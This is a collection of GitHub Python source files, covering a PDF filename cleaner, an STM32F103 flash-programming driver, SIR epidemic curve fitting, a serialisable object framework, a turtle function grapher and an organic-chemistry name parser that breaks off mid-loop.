arguments[\"action\"] = x\n if x not in [\"importer\"] :\n MyLogger.logger.warning(\"Votre premier argument (\"+x+\") est incorrect, seul 'importer' sont aurorisés.\")\n sys.exit(\"Erreur\")\n else :\n MyLogger.logger.info(\"Mode d'action choisi : \"+x+\".\")\n arguments[\"action\"] = x\n \n if len(arguments) == 0 :\n arguments[\"action\"] = \"more\"\n\n#Affichage \nif arguments[\"action\"] == \"importer\" :\n charger_config()\n importer()\nelif arguments[\"action\"] == \"more\" :\n more()\n\n#Message de fin.\nMyLogger.logger.info (\"Fin du script.\")\nsys.exit(0)\n\n \n","repo_name":"Happykiller/ODA_NOA","sub_path":"Scripts_python/import_oceane/script_import_oceane.py","file_name":"script_import_oceane.py","file_ext":"py","file_size_in_byte":12555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25358759934","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 26 12:11:47 2019\n\n@author: antonio\n\"\"\"\n\nimport os\n############# Make a copy of entire directory so we do not lose the originals ################# \n\n\ndef format_filenames(datapath, copy=False):\n \n if copy == True:\n ############# Make a copy of entire directory so we do not lose the originals #################\n \n # First, remove spaces (DONE through command line)\n \n # Then, remove weird characters\n for root, dirs, files in os.walk(datapath):\n for filename in files:\n if filename[-3:] == 'pdf': # get only txt files\n \n # Remove internal dots\n filename_no_dots = filename.replace('.', '')\n filename_list = list(filename_no_dots)\n filename_list[-3:] = list('.pdf')\n filename_one_dot = \"\".join(filename_list)\n \n # Remove internal commas and accents\n old_symbols = [',', 'á', 'é', 'í', 'ó', 'ú']\n new_symbols = ['', 'a', 'e', 'i', 'o', 'u']\n filename_new_symbols = filename_one_dot\n for old, new in zip(old_symbols, new_symbols):\n filename_new_symbols = filename_new_symbols.replace(',', '')\n \n # Rename file\n os.rename(os.path.join(root,filename), os.path.join(root, filename_new_symbols))\n \n else:\n print('Make a copy of entire directory so we do not lose the originals,then, change copy parameter to True') \nif __name__ == '__main__':\n ############# Make a copy of entire directory so we do not lose the originals ################# \n\n datapath = '/home/antonio/Downloads/ecimed_splitted'\n format_filenames(datapath, copy=False)","repo_name":"tonifuc3m/utils_BSC","sub_path":"format_filenames.py","file_name":"format_filenames.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42606206197","text":"import time\n\nFLASH_KR = 0x40022004\nFLASH_SR = 0x4002200C\nFLASH_CR = 0x40022010\nFLASH_AR = 0x40022014\n\nFLASH_KR_KEY1 = 0X45670123\nFLASH_KR_KEY2 = 0XCDEF89AB\n\nFLASH_SR_BUSY = (1 << 0)\n\nFLASH_CR_PWRITE = (1 << 0) #Page Write\nFLASH_CR_SERASE = (1 << 1) #Sect Erase\nFLASH_CR_CERASE = (1 << 2) #Chip Erase\nFLASH_CR_ESTART = (1 << 6) #Erase Start\nFLASH_CR_LOCK = (1 << 7)\n\nclass STM32F103C8(object):\n CHIP_CORE = 'Cortex-M3'\n\n PAGE_SIZE = 1024 * 1\n SECT_SIZE = 1024 * 1\n CHIP_SIZE = 1024 * 64\n\n def __init__(self, xlink):\n super(STM32F103C8, self).__init__()\n \n self.xlink = xlink\n\n def unlock(self):\n self.xlink.write_U32(FLASH_KR, FLASH_KR_KEY1)\n self.xlink.write_U32(FLASH_KR, FLASH_KR_KEY2)\n\n def lock(self):\n self.xlink.write_U32(FLASH_CR, self.xlink.read_U32(FLASH_CR) | FLASH_CR_LOCK)\n\n def wait_ready(self):\n while self.xlink.read_U32(FLASH_SR) & FLASH_SR_BUSY:\n time.sleep(0.001)\n \n def sect_erase(self, addr, size):\n self.unlock()\n self.xlink.write_U32(FLASH_CR, self.xlink.read_U32(FLASH_CR) | FLASH_CR_SERASE)\n for i in range(0, (size + self.SECT_SIZE - 1) // self.SECT_SIZE):\n self.xlink.write_U32(FLASH_AR, 0x08000000 + addr + self.SECT_SIZE * i)\n self.xlink.write_U32(FLASH_CR, self.xlink.read_U32(FLASH_CR) | FLASH_CR_ESTART)\n self.wait_ready()\n self.xlink.write_U32(FLASH_CR, self.xlink.read_U32(FLASH_CR) &~FLASH_CR_SERASE)\n self.lock()\n\n def page_write(self, addr, data):\n self.unlock()\n self.xlink.write_U32(FLASH_CR, self.xlink.read_U32(FLASH_CR) | FLASH_CR_PWRITE)\n for i in range(self.PAGE_SIZE//2):\n self.xlink.write_U16(addr + i*2, data[i*2] | (data[i*2+1] << 8))\n self.wait_ready()\n self.xlink.write_U32(FLASH_CR, self.xlink.read_U32(FLASH_CR) &~FLASH_CR_PWRITE)\n self.lock()\n \n def chip_write(self, addr, data):\n self.sect_erase(addr, len(data))\n\n for i in range(0, len(data)//self.PAGE_SIZE):\n self.page_write(0x08000000 + addr + self.PAGE_SIZE * i, data[self.PAGE_SIZE*i : self.PAGE_SIZE*(i+1)])\n\n def chip_read(self, addr, size, buff):\n c_char_Array = self.xlink.read_mem(addr, size)\n\n buff.extend(list(bytes(c_char_Array)))\n\n\nclass STM32F103RC(STM32F103C8):\n PAGE_SIZE = 1024 * 2\n SECT_SIZE = 1024 * 2\n CHIP_SIZE = 1024 * 256\n","repo_name":"XIVN1987/MCUProg","sub_path":"device/STM32F103_LS.py","file_name":"STM32F103_LS.py","file_ext":"py","file_size_in_byte":2432,"program_lang":"python","lang":"en","doc_type":"code","stars":133,"dataset":"github-code","pt":"37"} +{"seq_id":"26630801914","text":"from collections import defaultdict\nfrom sklearn.model_selection import ParameterSampler\nimport joblib\nimport numpy as np\nfrom pathlib import Path\nfrom iminuit import Minuit\nimport multiprocessing as mp\nfrom tqdm import tqdm\nfrom scipy.stats import uniform as sp_uniform\nfrom copy import copy, deepcopy\nfrom importlib import reload\nimport warnings\nfrom p_tqdm import p_umap\nfrom functools import partial\n\ntry:\n from src.utils import utils\n from src import file_loaders\n from src import SIR\nexcept ImportError:\n import utils\n import file_loaders\n import SIR\n\n# reload(SIR)\n\n\ndef uniform(a, b):\n loc = a\n scale = b - a\n return sp_uniform(loc, scale)\n\n\ndef extract_data(t, y, T_max, N_tot, y_max=0.01):\n \"\"\"Extract data where:\n 1) y is larger than 1‰ (permille) of N_tot\n 1) y is smaller than y_max of N_tot (default 1%)\n 1) t is less than T_max\"\"\"\n mask_min_1_permille = y > N_tot * 1 / 1000\n mask_max_1_percent = y < N_tot * y_max\n mask_T_max = t < T_max\n mask = mask_min_1_permille & mask_max_1_percent & mask_T_max\n return t[mask], y[mask]\n\n\ndef add_fit_results_to_fit_object(fit_object, filename, cfg, T_max, df, make_MC_fits=False):\n\n fit_object.filename = filename\n\n I_max_SIR, R_inf_SIR = SIR.calc_deterministic_results(cfg, T_max * 1.2, dt=0.01, ts=0.1)\n I_max_fit, R_inf_fit = fit_object.compute_I_max_R_inf(T_max=T_max * 1.5)\n\n fit_object.I_max_ABM = np.max(df[\"I\"])\n fit_object.I_max_fit = I_max_fit\n fit_object.I_max_SIR = I_max_SIR\n\n fit_object.R_inf_ABM = df[\"R\"].iloc[-1]\n fit_object.R_inf_fit = R_inf_fit\n fit_object.R_inf_SIR = R_inf_SIR\n\n if make_MC_fits:\n SIR_results, I_max_MC, R_inf_MC = fit_object.make_monte_carlo_fits(\n N_samples=100, T_max=T_max * 1.5, ts=0.1\n )\n # fit_object.SIR_results = SIR_results\n fit_object.I_max_MC = I_max_MC\n fit_object.R_inf_MC = R_inf_MC\n\n\ndef draw_random_p0(cfg, N_max_fits):\n param_grid = {\n # 'lambda_E': uniform(cfg.lambda_E/10, cfg.lambda_E*5),\n # 'lambda_I': uniform(cfg.lambda_I/10, cfg.lambda_I*5),\n \"beta\": uniform(cfg.beta / 10, cfg.beta * 5),\n \"tau\": uniform(-10, 10),\n }\n i = 0\n while i < N_max_fits:\n random_p0 = list(ParameterSampler(param_grid, n_iter=1))[0]\n yield i, random_p0\n i += 1\n\n\ndef refit_if_needed(fit_object, cfg, bounds, fix, minuit, N_max_fits=10, debug=False):\n\n fit_failed = True\n i_refits = 0\n\n if fit_object.valid_fit:\n fit_failed = False\n\n else:\n\n minuit_dict = dict(\n pedantic=False,\n print_level=0,\n **bounds,\n errordef=Minuit.LEAST_SQUARES,\n **fix,\n )\n\n # max_reduced_chi2 = np.linspace(3, 3, N_max_fits)\n\n best_fit_red_chi2 = 1e10\n best_fit = None\n\n for i_refits, random_p0 in draw_random_p0(cfg, N_max_fits):\n\n minuit = Minuit(fit_object, **random_p0, **minuit_dict)\n minuit.migrad()\n # fit_object.set_minuit(minuit, max_reduced_chi2[i_refits])\n fit_object.set_minuit(minuit, max_reduced_chi2=100)\n\n better_chi2 = fit_object.reduced_chi2 < best_fit_red_chi2\n semi_valid = fit_object._valid_fit(minuit, max_reduced_chi2=None)\n if better_chi2 and semi_valid:\n best_fit = copy(fit_object)\n best_fit_red_chi2 = fit_object.reduced_chi2\n\n if debug:\n print(i_refits, fit_object.reduced_chi2)\n\n if fit_object.valid_fit:\n fit_failed = False\n fit_object = best_fit\n break\n\n # if unable to fit the data, stop the fit\n if fit_failed:\n return fit_object, fit_failed\n\n # compute better errors (slow!)\n # minuit.minos()\n # fit_object.set_minuit(minuit)\n\n fit_object.N_refits = i_refits\n return fit_object, fit_failed\n\n\ndef run_actual_fit(t, y, sy, cfg, dt, ts):\n\n debug = False\n # debug = True\n\n # np.random.seed(cfg.ID)\n np.random.seed(42)\n\n if debug:\n reload(SIR)\n print(\"delete this\")\n\n # reload(SIR)\n normal_priors = dict(\n # multiplier=0,\n # lambda_E={'mean': cfg.lambda_E, 'std': cfg.lambda_E/10},\n # lambda_I={'mean': cfg.lambda_I, 'std': cfg.lambda_I/10},\n # beta= {'mean': 0.01, 'std': 0.05},\n )\n\n p0 = dict(\n lambda_E=cfg.lambda_E,\n lambda_I=cfg.lambda_I,\n beta=cfg.beta,\n tau=0,\n )\n\n bounds = dict(\n limit_lambda_E=(1e-6, None),\n limit_lambda_I=(1e-6, None),\n limit_beta=(1e-6, None),\n )\n\n fix = dict(\n fix_lambda_E=True,\n fix_lambda_I=True,\n )\n\n fit_object = SIR.FitSIR(t, y, sy, normal_priors, cfg, dt=dt, ts=ts)\n minuit = Minuit(\n fit_object,\n pedantic=False,\n print_level=0,\n **p0,\n **bounds,\n **fix,\n errordef=Minuit.LEAST_SQUARES,\n )\n\n minuit.migrad()\n\n fit_object.set_minuit(minuit)\n\n fit_object, fit_failed = refit_if_needed(fit_object, cfg, bounds, fix, minuit, debug=debug)\n\n return fit_object, fit_failed\n\n\ndef fit_single_file(filename, cfg, ts=0.1, dt=0.01, y_max=0.01):\n\n df = file_loaders.pandas_load_file(filename)\n\n df_interpolated = SIR.interpolate_df(df)\n\n # Time at end of simulation\n T_max = df[\"time\"].max()\n\n # time at peak I (peak infection)\n T_peak = df[\"time\"].iloc[df[\"I\"].argmax()]\n\n # extract data between 1 permille and 1 percent I of N_tot and lower than T_max\n t, y = extract_data(\n t=df_interpolated[\"time\"].values,\n y=df_interpolated[\"I\"].values,\n T_max=T_peak,\n N_tot=cfg.N_tot,\n y_max=y_max,\n )\n sy = np.sqrt(y)\n\n if len(t) < 5:\n return filename, f\"Too few datapoints (N = {len(t)})\"\n\n fit_object, fit_failed = run_actual_fit(t, y, sy, cfg, dt, ts)\n if fit_failed:\n return filename, \"Fit failed\"\n\n try:\n add_fit_results_to_fit_object(\n fit_object,\n filename,\n cfg,\n T_max,\n df,\n make_MC_fits=False,\n )\n except AttributeError as e:\n print(filename)\n print(\"\\n\\n\")\n raise e\n\n return filename, fit_object\n\n\n#%%\n\nfrom collections import Counter\n\n\ndef fit_multiple_files(cfg, filenames, num_cores=1, do_tqdm=True, y_max=0.01, verbose=False):\n\n func = partial(fit_single_file, cfg=cfg, y_max=y_max)\n\n if num_cores == 1:\n if do_tqdm:\n filenames = tqdm(filenames)\n results = [func(filename) for filename in filenames]\n\n else:\n results = p_umap(func, filenames, num_cpus=num_cores, disable=True)\n\n reject_counter = Counter()\n\n # postprocess results from multiprocessing:\n fit_objects = {}\n for filename, fit_result in results:\n\n if isinstance(fit_result, str):\n if verbose:\n print(f\"\\n\\n{filename} was rejected due to {fit_result.lower()}\")\n reject_counter[fit_result.lower()] += 1\n\n else:\n fit_object = fit_result\n fit_objects[filename] = fit_object\n reject_counter[\"no rejection\"] += 1\n\n return fit_objects, reject_counter\n\n\ndef get_fit_results(abm_files, force_rerun=False, num_cores=1, y_max=0.01):\n\n all_fits_file = f\"Data/fits_ymax_{y_max}.joblib\"\n\n if Path(all_fits_file).exists() and not force_rerun:\n print(\"Loading all Imax fits\", flush=True)\n return joblib.load(all_fits_file)\n\n else:\n\n all_fits = {}\n print(\n f\"Fitting {len(abm_files.all_filenames)} files with {len(abm_files.cfgs)} different simulation parameters, please wait.\",\n flush=True,\n )\n\n reject_counter = Counter()\n\n desc = \"Fitting ABM simulations\"\n for cfg, filenames in tqdm(abm_files.iter_folders(), total=len(abm_files.cfgs), desc=desc):\n # break\n output_filename = Path(\"Data/fits\") / f\"fits_{cfg.hash}_ymax_{y_max}.joblib\"\n utils.make_sure_folder_exist(output_filename)\n\n if output_filename.exists():\n all_fits[cfg.hash] = joblib.load(output_filename)\n\n else:\n with warnings.catch_warnings():\n warnings.filterwarnings(\n \"ignore\", message=\"covariance is not positive-semidefinite.\"\n )\n fit_results, reject_counter_tmp = fit_multiple_files(\n cfg,\n filenames,\n num_cores=num_cores,\n y_max=y_max,\n )\n\n joblib.dump(fit_results, output_filename)\n all_fits[cfg.hash] = fit_results\n reject_counter += reject_counter_tmp\n\n print(reject_counter)\n\n joblib.dump(all_fits, all_fits_file)\n return all_fits\n\n\nif False:\n\n import matplotlib.pyplot as plt\n from matplotlib.ticker import EngFormatter\n\n filename = \"Data/ABM/e24e6303fc/ABM_2020-10-12_e24e6303fc_ID__0.hdf5\"\n cfg = file_loaders.filename_to_cfg(filename)\n filename, fit_result = fit_single_file(filename, cfg, ts=0.1, dt=0.01, y_max=0.01)\n\n t = fit_result.t\n T_max = max(t) * 1.1\n df_fit = fit_result.calc_df_fit(ts=0.1, T_max=T_max)\n\n xlim = (63, 97)\n ylim = (0, 75_000)\n\n fig, ax = plt.subplots(figsize=(6, 6))\n ax.errorbar(t, fit_result.y, fit_result.sy, fmt=\".\", label=\"ABM\")\n ax.plot(df_fit[\"time\"], df_fit[\"I\"], label=\"Fit\")\n ax.set(xlim=xlim, title=\"Fit\", ylim=ylim)\n ax.text(\n 0.1,\n 0.8,\n f\"$\\chi^2 = {fit_result.chi2:.1f}, N = {fit_result.N}$\",\n transform=ax.transAxes,\n fontsize=24,\n )\n ax.yaxis.set_major_formatter(EngFormatter())\n\n\n#%%\n\nimport pandas as pd\n\nfrom iminuit import Minuit, describe\nfrom iminuit.util import make_func_code\nfrom IPython.display import display\n\n\ndef exponential(t, I_0, R_eff, T):\n return I_0 * R_eff ** (t / T)\n\n\nclass FitSingleInfection_R_eff:\n def __init__(self, I, x=None, verbose=True):\n\n self.I = I.copy()\n if x is not None:\n self.x = x.copy()\n else:\n self.x = np.arange(len(I))\n self.sy = np.sqrt(I)\n\n self.verbose = verbose\n\n self.model = exponential\n self.fit_kwargs = {\n \"I_0\": self.I[0],\n \"R_eff\": 1,\n \"limit_R_eff\": (0, None),\n \"T\": 4.7,\n \"fix_T\": True,\n }\n self.func_code = make_func_code(describe(self.model)[1:])\n self.N_fit_parameters = len(describe(self.model)[1:])\n self.N = len(I)\n self.df = self.N - self.N_fit_parameters\n\n def __call__(self, *par):\n yhat = self.model(self.x, *par)\n chi2 = np.sum((yhat - self.I) ** 2 / self.sy ** 2)\n return chi2\n\n def fit_single_week(self, verbose=None):\n if verbose is None:\n verbose = self.verbose\n m = Minuit(self, errordef=1, pedantic=False, **self.fit_kwargs)\n m.migrad()\n if not m.fmin.is_valid:\n print(\"Not valid fit\")\n if verbose:\n display(m.fmin)\n display(m.params)\n return dict(m.values), dict(m.errors)\n\n def fit_daily_R_eff(self, time_shift=0, keep_all_times=True):\n self.I_org = self.I.copy()\n self.x_org = self.x.copy()\n self.sy_org = self.sy.copy()\n R_eff = {}\n for day in range(7, self.N):\n days = np.arange(day - 7, day)\n self.I = self.I_org[days]\n self.x = self.x_org[days]\n self.sy = self.sy_org[days]\n values, errors = self.fit_single_week(verbose=False)\n\n if keep_all_times or day - time_shift >= 0:\n R_eff[day - time_shift] = {\n \"mean\": values[\"R_eff\"],\n \"std\": errors[\"R_eff\"],\n \"day_start\": days[0] - time_shift,\n \"day_end\": days[-1] - time_shift,\n }\n R_eff = pd.DataFrame(R_eff).T\n self.I = self.I_org\n self.x = self.x_org\n self.sy = self.sy_org\n del self.I_org\n del self.x_org\n del self.sy_org\n return R_eff.convert_dtypes().copy()\n","repo_name":"ChristianMichelsen/NetworkSIR","sub_path":"src/fits.py","file_name":"fits.py","file_ext":"py","file_size_in_byte":12240,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"21090364842","text":"\nimport sys\n\nfrom bento.properties import _BaseProperty, ObjectProperty, ListProperty, LockedProperty\nfrom bento.core_exceptions import *\n\n\nclass _BentobjMetaclass(type):\n\n def __new__(cls, name, bases, dct):\n\n for base in bases:\n for key, value in base.__dict__.items():\n if isinstance(value,_BaseProperty):\n dct[key] = base.__dict__[key]\n # WARNING! potential bug!\n # delattr(base, key)\n\n prop = {}\n for key,value in dct.items():\n if isinstance(value, _BaseProperty):\n prop[key] = (value.__class__, value._property_index)\n\n consecutive_arguments = [(key,value[1]) for key,value in prop.items()]\n consecutive_arguments.sort(key=lambda a : a[1])\n consecutive_arguments = [arg for arg,i in consecutive_arguments]\n\n dct.update({'_core_properties': prop,\n '_consecutive_arguments': consecutive_arguments,\n })\n \n return super(_BentobjMetaclass, cls).__new__(cls, name, bases, dct)\n\n\n# Create the base class according to python version\n# Base class definition for Python 3 is not in the same \n# file because it raises an syntax error when running\n# in a Python 2 environment.\nif sys.version_info.major == 3:\n from bento._p3k_metaclass import get_p3k_metaclass\n _Bentobjct = get_p3k_metaclass(_BentobjMetaclass)\n\nelse:\n class _Bentobjct(object):\n __metaclass__ = _BentobjMetaclass\n\n\nclass Bento(_Bentobjct):\n\n def __init__(self, *args, **kwargs):\n \n self._cached_properties = {} #cache for define_ functions\n self._strongly_cached_properties = set() # define_functions which will never be removed from cache\n self._set_consecutive_arguments(args)\n\n for prop_name in self._consecutive_arguments[len(args):]:\n prop = self.__class__.__getattribute__(self.__class__,prop_name)\n if prop.required_property:\n if not prop_name in kwargs.keys():\n if not hasattr(self, \"init_%s\" % prop_name) and not hasattr(self.__class__, \"define_%s\" % prop_name):\n raise TypeError(\"Missing required value: '%s'\" % prop_name)\n \n self.__explicity_values = []\n for key,value in kwargs.items():\n if key in self._core_properties:\n #TODO: locked\n # if isinstance(self.__class__.__getattribute__(self.__class__,key), LockedProperty):\n # print(8888)\n self.__explicity_values.append(key)\n setattr(self, key, value)\n else:\n raise UnexpectedArgumentError(\"Got an unexpected key: '%s'\" % key)\n \n self._lazy_pointers = {}\n self._define_properties()\n\n\n def _define_properties(self):\n \"\"\"\n This function handle automatic definitions for properties\n\n class A(Bento):\n a = IntegerProperty()\n def init_a(self):\n a = rand.random()\n \"\"\"\n for prop in self._core_properties.keys():\n\n if prop in self.__explicity_values:\n continue\n\n init_name = \"init_%s\" % prop\n lazy = \"define_%s\" % prop\n if hasattr(self.__class__, lazy):\n f = getattr(self, lazy)\n self._lazy_pointers[prop] = f\n continue\n\n if hasattr(self, init_name):\n f = getattr(self, init_name)\n value = f()\n setattr(self, prop, value)\n \n\n def _set_consecutive_arguments(self, args):\n \n if len(args) > len(self._consecutive_arguments):\n raise ArgumentsArithmError()\n\n for arg,attr in zip(args, self._consecutive_arguments):\n setattr(self, attr, arg)\n\n def dump(self):\n \"\"\"\n Convert it from object to structure\n \"\"\"\n\n d = {}\n\n for arg in self._consecutive_arguments:\n if hasattr(self, arg):\n obj = getattr(self, arg)\n\n if isinstance(obj, Bento):\n d[arg] = obj.dump()\n elif isinstance(obj,(list, tuple)):\n if obj:\n if isinstance(obj[0], Bento):\n d[arg] = [v.dump() for v in obj]\n else:\n d[arg] = [v for v in obj]\n else:\n d[arg] = []\n else:\n d[arg] = getattr(self, arg)\n\n return d\n\n @classmethod\n def load(cls, raw):\n \"\"\" \n Recreate a Bento object based on a structure\n \"\"\"\n bento_object = cls()\n\n for key,value in raw.items():\n\n if key in bento_object._core_properties:\n meta_obj = cls.__getattribute__(cls,key)\n \n if isinstance(meta_obj, ObjectProperty):\n obj_class = meta_obj._object_definition\n obj = obj_class.load(value)\n setattr(bento_object, key, obj)\n\n elif isinstance(meta_obj, ListProperty):\n obj_class = meta_obj._keys['list_content_type']\n if issubclass(obj_class, Bento):\n obj = [obj_class.load(v) for v in value]\n else:\n obj = [obj_class(v) for v in value]\n setattr(bento_object, key, obj)\n\n else:\n setattr(bento_object, key, value)\n \n else:\n raise UnexpectedArgumentError(\"%s got an unexpected argument named '%s'\" % (cls, key))\n\n return bento_object\n\n def _touch(self):\n \"\"\"\n Actually does nothing. Used for performance measurement\n \"\"\"\n\n for arg in self._consecutive_arguments:\n if hasattr(self, arg):\n obj = getattr(self, arg)\n\n if isinstance(obj, Bento):\n obj._touch()\n elif isinstance(obj,(list, tuple)):\n if obj:\n if isinstance(obj[0], Bento):\n for v in obj:\n v._touch()\n else:\n getattr(self, arg)\n\n\n\n\ndef cache(function):\n \"\"\"\n Cache decorator\n \"\"\"\n\n def decorator(*args, **kwargs):\n self = args[0]\n prop_name = function.__name__[7:] # removing 'define_'\n self._strongly_cached_properties.add(prop_name)\n return function(*args, **kwargs)\n\n if function.__name__.startswith('define_'):\n return decorator\n else:\n return function\n","repo_name":"alvesjnr/PyBento","sub_path":"bento/objects.py","file_name":"objects.py","file_ext":"py","file_size_in_byte":6765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11997809764","text":"import turtle\nimport graph.module as module\n\n\nclass Graph:\n ''' Represent a Cartesian orthogonal system Oxy\n\n Attributes: width - lenght of Ox\n height - lenght of Oy\n unit - pixels correspond with 1 unit in Ox\n pen - a object of turtle class\n '''\n def __init__(self, width, height):\n self.width = width\n self.height = height\n self.unit = 250 / max(self.width, self.height)\n self.pen = turtle.Turtle()\n self.pen.hideturtle() # hide turtle\n self.pen.speed(0) # set max speed\n\n module.initOxy(self.pen, self.width, self.height, self.unit)\n # draw Cartesian orthogonal system Oxy\n\n color = ['red', 'blue', 'green', 'brown', 'orange'] # color of pen\n indexColor = 0\n\n def draw(self, func, sepLine=True):\n if sepLine: # 2 line is not same color\n if Graph.indexColor == len(Graph.color):\n Graph.indexColor = 0\n self.pen.pencolor(Graph.color[Graph.indexColor])\n Graph.indexColor += 1\n\n lines = module.makeLine(func, self.width, self.height, self.unit)\n for line in lines:\n first = True\n for (x, y) in line:\n if first: # this point is the first of a line\n self.pen.pu()\n self.pen.goto((x, y))\n self.pen.pd()\n first = False\n else:\n self.pen.goto((x, y))\n\n\ndef main():\n width = turtle.numinput('INPUT WIDTH', 'Enter width: ', 10, 0, 50)\n if width is None:\n return\n\n height = turtle.numinput('INPUT HEIGHT', 'Enter height: ', 10, 0, 50)\n if height is None:\n return\n\n graph = Graph(width, height)\n\n while True:\n func = turtle.textinput(\"IMPORT FUNCTION\", \"Enter function: \")\n if func is None:\n break\n\n graph.draw(func)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Hi-Im-darkness/graph","sub_path":"graph/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71302717547","text":"#Organic Chemistry\nimport turtle\nimport re\n\nprefixes = ['meth','eth','prop','but','pent','hex','hept','oct','non','dec','undec','dodec'] \ngreekL = ['di','tri','tetra'] + [elt + 'a' for elt in prefixes[4:]]\nsuffixes = {'e':[],'ol':['OH'],'al':['O'],'one':['O'],'oique':['O','OH']}\n\nGRID = 6\nDEG = 360/GRID\nSIZE = 50\n\ndef valid(molecule):\n #BEHOLD MY MONSTROSITY\n Npre = '(' + '|'.join(prefixes) + ')'\n Gpre = '(' + '|'.join(greekL) + ')'\n suf1 = '(' + '|'.join(list(suffixes)[::2]) + ')' #suffixes that don't need a positional argument\n suf2 = '(' + '|'.join(list(suffixes)[1::2]) + ')' #suffixes that need a positional argument\n \n nums = '(([0-9],?)+)-' #ex: 2,12,3,6\n rams = nums+Gpre+'?'+Npre+'yl' #ex: 2,2-dimethyl\n \n groups = nums+Gpre+'?'+suf2 #ex: -2,3-diol\n princ = Npre+'an('+suf1+'|(-'+groups+'))' #ex: propane, methanoique, butan-1,2-diol\n \n exp = r'(acide )?('+rams+'(-?))*'+princ #3-ethyl-2,2-dimethylhexan-4,5-diol]\n \n ind = re.fullmatch(exp,molecule)\n\n if ind == None:\n return False\n return True\n\ndef removeAcide(mol):\n if mol[:6] == 'acide ':\n if mol[-5:] == suffixes[4]:\n mol = mol[6:]\n else:\n print('ERROR not acide')\n \n return mol\n\ndef getElt(liste, mol):\n for elt in liste:\n if mol.find(elt) == 0:\n return elt\n return None\n\ndef getList(link, string):\n liste = []\n temp = ''\n for x in string:\n if x != link:\n temp += x\n else:\n liste.append(temp)\n temp = ''\n if temp != '':\n liste.append(temp)\n return liste\n\ndef getNumbs(string):\n ind = string.find('-')\n numb = getList(',', string[:ind])\n string = string[ind+1:]\n \n numb = [int(elt) for elt in numb]\n \n return numb, string\n\ndef getRepeat(string):\n greek = getElt(greekL, string)\n \n repeat = 1\n if greek:\n repeat = greekL.index(greek)+2\n string = string[len(greek):]\n \n return repeat, string\n\ndef sign(degrees):\n if degrees > 180:\n return -1\n else:\n return 1\n\ndef drawElt(elt, t):\n if type(elt) == str:\n t.write(elt, align=\"center\", font=('Arial', 12, 'bold'))\n elif type(elt) == int:\n tempPos = t.pos()\n tempHead = t.heading()\n d = 1\n t.down()\n for i in range(elt-1):\n t.right(d*DEG)\n d = -d\n t.forward(SIZE)\n t.up()\n t.setpos(tempPos)\n t.seth(tempHead)\n t.down()\n\ndef drawMolecule(liste):\n wn = turtle.Screen()\n wn.bgcolor(\"#eeeee4\")\n wn.title(\"PC Organic Chemistry\")\n #<-code from https://stackoverflow.com/questions/44775445/python-turtle-window-on-top\n rootwindow = wn.getcanvas().winfo_toplevel()\n rootwindow.call('wm', 'attributes', '.', '-topmost', '1')\n rootwindow.call('wm', 'attributes', '.', '-topmost', '0')\n #->\n\n turt = turtle.Turtle()\n turt.pensize(2)\n turt.up()\n\n offset = -(len(liste)-1)*43\n turt.setx(offset/2)\n \n #DRAW FIRST LINK\n turt.down()\n if len(liste[0]) >= 1:\n drawElt(liste[0][0], turt)\n turt.seth(DEG/2)\n turt.forward(SIZE)\n \n if len(liste[0]) >= 2:\n turt.right(DEG*2)\n turt.backward(SIZE)\n drawElt(liste[0][1], turt)\n turt.forward(SIZE)\n turt.left(DEG)\n turt.up()\n turt.seth(DEG/2)\n \n #DRAW CHAIN\n for C in liste[1:-1]:\n turt.down()\n if turt.heading() < 180:\n turt.right(DEG)\n else:\n turt.left(DEG)\n \n if len(C) >= 0:\n turt.forward(SIZE)\n if len(C) == 1:\n turt.left(sign(turt.heading()) * 60)\n turt.forward(SIZE)\n drawElt(C[0], turt)\n turt.backward(SIZE)\n turt.right(sign(turt.heading()) * 60)\n if len(C) == 2:\n turt.left(sign(turt.heading()) * 90)\n turt.forward(SIZE)\n drawElt(C[0], turt)\n turt.backward(SIZE)\n turt.right(sign(turt.heading()) * 180)\n turt.forward(SIZE)\n drawElt(C[1], turt)\n turt.backward(SIZE)\n turt.right(sign(turt.heading()) * 150)\n turt.up() \n \n #DRAW LAST\n if len(liste) > 1:\n turt.down()\n if turt.heading() < 180:\n turt.right(DEG)\n else:\n turt.left(DEG)\n \n if len(liste[-1]) == 0:\n turt.forward(SIZE)\n \n if len(liste[-1]) >= 1:\n drawElt(liste[-1][0], turt)\n turt.seth(DEG/2)\n turt.forward(SIZE)\n \n if len(liste[-1]) >= 2:\n turt.backward(SIZE)\n turt.right(DEG)\n turt.forward(SIZE)\n drawElt(liste[-1][-1], turt)\n turt.up()\n turt.hideturtle()\n turtle.done()\n\ndef parseMolecule(mol):\n tempM = mol\n \n #RAMMIFICATION\n rammify = []\n\n for i in range(tempM.count('yl')):\n numb, tempM = getNumbs(tempM)\n repeat, tempM= getRepeat(tempM)\n \n if len(numb) != repeat:\n print(\"ERROR: {} doesn't match {}\".format(len(numb),repeat))\n \n pre = getElt(prefixes, tempM)\n tempM = tempM[len(pre):]\n \n val = prefixes.index(pre)+1\n for i in range(repeat):\n rammify.append((numb[i],val))\n tempM = tempM[2:]\n \n if tempM[0] == '-':\n tempM = tempM[1:]\n\n print(rammify)\n\n #CHAINE PRINCIPAL\n\n print(tempM)\n\n pre = getElt(prefixes, tempM)\n tempM = tempM[len(pre) + 2:]\n\n numb = [1] #when the ending is suf1\n if tempM[0] == '-':\n numb, tempM = getNumbs(tempM[1:])\n repeat, tempM= getRepeat(tempM)\n if len(numb) != repeat:\n print(\"ERROR: {} doesn't match {}\".format(len(numb),repeat))\n\n suf = getElt(suffixes, tempM)\n\n val = prefixes.index(pre)+1\n\n tableau = [[] for i in range(val)]\n for elt in rammify:\n tableau[elt[0]-1].append(elt[1])\n\n for i in numb:\n for atom in suffixes.get(suf):\n tableau[i-1].append(atom)\n \n return tableau\n\n\n#------------------- PROGRAMME -------------------\n\nwhile True:\n molecule = input(\"Insert molecule name: \").lower()\n\n if valid(molecule):\n break\n else:\n 